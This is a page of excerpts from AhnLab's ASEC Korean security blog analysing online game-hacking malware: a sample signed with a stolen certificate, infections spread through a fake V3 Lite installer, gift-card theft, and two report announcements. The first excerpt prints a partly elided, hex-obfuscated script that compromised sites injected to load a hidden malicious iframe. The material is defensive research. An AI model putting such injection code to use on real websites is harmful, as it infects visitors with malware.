온라인게임핵

국내P2P 사이트의 인증서를 악용한 온라인 게임핵

   악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다. [그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드 위 [그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다. 최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다. http://on****.co.kr/js/makePCookie.js • 난독화된 악성 스크립트 링크: window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](“x3cx69x66x72x61x6dx65 x77x69x64x74x68x3dx27x31x30x30x27x68x65x69x67x68x74x3dx27x30 x27x73x72x63x3dx27x68x74x74x70x3ax2fx2fx73x6ex73x6fx66x74x2ex64 x69//—중간생략—//x2ex68x74x6dx6cx27x3ex3cx2fx69x66x72x61x6dx65x3e”);   • 난독화 해제 후 코드:   난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한…

PUP(불필요한 프로그램)를 통한 온라인 게임핵 유포

   온라인 게임핵으로 인한 많은 피해사례들이 보고되고 있는 가운데, 악성코드 감염시스템을 확인해 보면 다수의 PUP 프로그램이 설치되어 있었다. 이러한 PUP프로그램을 통해 온라인 게임핵이 유포되는 경우가 종종 발견되고 있어 사용자의 주의가 필요하다.   많은 사람들이 무료 프로그램이나 특정 툴을 다운로드 받을 때, 제작사의 홈페이지를 통해서 프로그램을 다운로드 받는 것이 아니라, 특정 게시판이나 블로그를 통해서 다운로드 받기도 한다.   개인에게 무료로 제공되고 있는 V3 Lite의 설치파일(v3litesg_setup.exe)을 위장하여 V3 Lite설치와 동시에 다수의 PUP 프로그램을 설치하고, 이 중 특정 PUP 프로그램이 온라인 게임핵을 다운로드하여 설치하는 방식으로 유포되고 있었다.   – 악성코드 유포 블로그 [그림 1] 블로그에 게시된 악성파일   V3 설치파일로 위장한 파일을 다운로드 받은 후 속성을 살펴보면 안랩 홈페이지(http://www.ahnlab.com)에서 배포되는 V3 Lite의 설치버전과 다르다는 것을 알 수 있다.   [그림 2] V3 Lite…

ASEC 보안 위협 동향 리포트 2012 Vol.36 발간

안랩 ASEC에서 2012년 12월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.36을 발간하였다.  이 번에 발간된 ASEC 리포트는 2012년 12월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다. 1) 악성코드 이슈 온라인 뱅킹 트로이목마 Banki(1) 온라인 뱅킹 트로이목마 Banki(2) 패스워드를 노리는 악성코드 악성코드의 3단 콤보 공격 온라인 게임핵 변종 악성코드 특정 후보의 정책관련 한글문서 위장 악성코드 부킹닷컴을 사칭한 악성코드 과다 트래픽을 발생시키는 악성코드 상품권 번호 탈취하는 온라인 게임핵 악성코드 Xerox WorkCentre를 사칭한 악성 메일 Facebook을 사칭한 악성 e-mail 주의 2) 모바일 악성코드 이슈 국내 스마트폰 사용자를 노린 Win-Android/Chest 악성코드 PUP 앱의 폭발적인 증가 3) 보안 이슈 Stuxnet 기술을 이용하는 MySQL 취약점 지속적으로 보고되는 인터넷 익스플로러 use-after-free 취약점 4) 2012년 보안 동향 분석 악성코드 통계 – 2012년 악성코드,…

연말 포상으로 받은 상품권은 악성코드 제작자에게…

국내에서는 3가지 피해사례가 끊임없이 발견되고 있다. 1. 온라인게임 계정 유출로 인한 피해 2. 안드로이드 기반의 스마트폰 소액결제로 인한 피해 3. 상품권 번호 유출로 인한 피해   1,2 번 항목에 해당하는 악성코드는 ASEC 블로그를 통하여 많은 정보를 게시하였다. http://asec.ahnlab.com/793 [온라인 게임 계정 유출 악성코드] http://asec.ahnlab.com/772 [온라인 게임 계정 유출 악성코드] http://asec.ahnlab.com/search/CHEST [스마트폰 SMS 정보 유출로 인한 결제 피해]   국내에서는 주말을 이용하여 대량 배포되고 있는 사용자의 정보 탈취용 악성코드가 끊임없이 발견되고 있다. 그 변종 또한 셀 수 없이 많으며, 이번에는 상품권 정보가 어떻게 유출 되는지 3번 항목에 대하여 살펴 보자.   해당 악성코드에 감염될 경우, 파일 생성 정보와 네트워크 정보는 아래와 같다. 네트워크 트래픽을 보면 PC의 MAC, OS, 사용하는 AV 정보들을 전송하는 것을 확인할 수 있다.   testsample.exe     CREATE C:WINDOWSsystem32drivers7f12a432.sys     testsample.exe     CREATE C:WINDOWSsystem32kakubi.dll testsample.exe     CREATE C:WINDOWSsystem32wshtcpbi.dll     testsample.exe     DELETE C:WINDOWSsystem32wshtcpip.dll     testsample.exe     CREATE…

ASEC 보안 위협 동향 리포트 2012 Vol.31 발간

안랩 ASEC에서 2012년 7월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.31을 발간하였다.  이 번에 발간된 ASEC 리포트는 2012년 7월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다. 1) 악성코드 이슈 Banki 트로이목마의 공습 구글 코드를 악용한 악성코드 유포 국외 은행 피싱 메일 아래아한글 취약점을 악용한 파일 추가 발견 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷 BHO에 등록되는 온라인 게임핵 악성코드 WinSocketA.dll 파일을 이용하는 온라인 게임핵 Cross-Platform 악성코드 위구르족을 타깃으로 한 맥 악성코드 2) 모바일 악성코드 이슈 APT 공격과 관련된 안드로이드 악성코드 발견 스마트폰에도 설치되는 애드웨어 3) 보안 이슈 DNS changer 감염으로 인한 인터넷 접속 장애 주의 BIND 9 취약점 발견 및 업데이트 권고 어느 기업의 데이터 유출 후, 고객에게 보내진 ‘보안 패치’ 메일의 비밀 4)…